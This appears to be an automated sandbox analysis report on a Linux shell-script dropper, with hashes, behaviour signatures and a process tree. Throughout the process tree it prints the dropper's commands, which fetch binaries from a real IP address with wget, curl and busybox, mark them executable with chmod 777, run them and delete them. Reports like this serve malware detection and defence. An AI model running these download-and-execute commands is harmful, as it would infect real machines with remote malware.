Analysis
-
max time kernel
149s -
max time network
154s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipsel image:debian9-mipsel-20240226-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
18/10/2024, 02:16
Static task
static1
Behavioral task
behavioral1
Sample
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh
-
Size
10KB
-
MD5
62cc0d748ce1bc23e334fb8337b1bf09
-
SHA1
6ad81a5d3316adcab7a039a21fa81bfbcbf8b748
-
SHA256
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6
-
SHA512
276eac78c58b4d7a6fc6421f2ec0499bfda30e027d56c3602575fe6e71f2a006c4ca64db15c7080c252f02c698df1e83702fe82ac41266fcd0cebb3ba32454f5
-
SSDEEP
192:fgZwipsY9skLiE1Zq/7DlJOqDgAimsY9skyxB1Zq/7DHOqDgAiA:fewiBi19a5UAA
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh/tmp/988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:707
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:711
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:718
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:729
-
-
/bin/chmodchmod 777 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS./BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:735
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:736
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:739
-
-
/bin/chmodchmod 777 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk./rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:743
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:745
-
-
/bin/chmodchmod 777 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj./De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:748
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:749
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:779
-
-
/bin/chmodchmod 777 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv./lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:789
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:792
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:807
-
-
/bin/chmodchmod 777 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu./p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:811
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:812
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:814
-
-
/bin/chmodchmod 777 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR./3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:817
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:818
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:826
-
-
/bin/chmodchmod 777 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr./LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Executes dropped EXE
PID:831
-
-
/bin/rmrm LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:834
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:836
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:841
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:856
-
-
/bin/chmodchmod 777 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG./TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:859
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:860
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:862
-
-
/bin/chmodchmod 777 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ./FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:865
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:866
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:868
-
-
/bin/chmodchmod 777 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU./s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:871
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:872
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:874
-
-
/bin/chmodchmod 777 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo./r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:877
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:878
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:880
-
-
/bin/chmodchmod 777 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD./c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:883
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:884
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:886
-
-
/bin/chmodchmod 777 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH./J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:889
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:890
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:892
-
-
/bin/chmodchmod 777 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R./xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:895
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:896
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:898
-
-
/bin/chmodchmod 777 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk./rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:901
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:902
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:904
-
-
/bin/chmodchmod 777 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj./De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:907
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:908
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:910
-
-
/bin/chmodchmod 777 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS./BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:913
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:914
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:916
-
-
/bin/chmodchmod 777 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu./p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:919
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:920
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:922
-
-
/bin/chmodchmod 777 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR./3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:928
-
-
/bin/chmodchmod 777 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv./lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:931
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:934
-
-
/bin/chmodchmod 777 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU./s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:937
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:940
-
-
/bin/chmodchmod 777 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo./r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:946
-
-
/bin/chmodchmod 777 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD./c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:949
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:952
-
-
/bin/chmodchmod 777 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr./LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:958
-
-
/bin/chmodchmod 777 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG./TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:964
-
-
/bin/chmodchmod 777 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ./FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:970
-
-
/bin/chmodchmod 777 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH./J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:973
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:974
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:976
-
-
/bin/chmodchmod 777 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R./xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:979
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97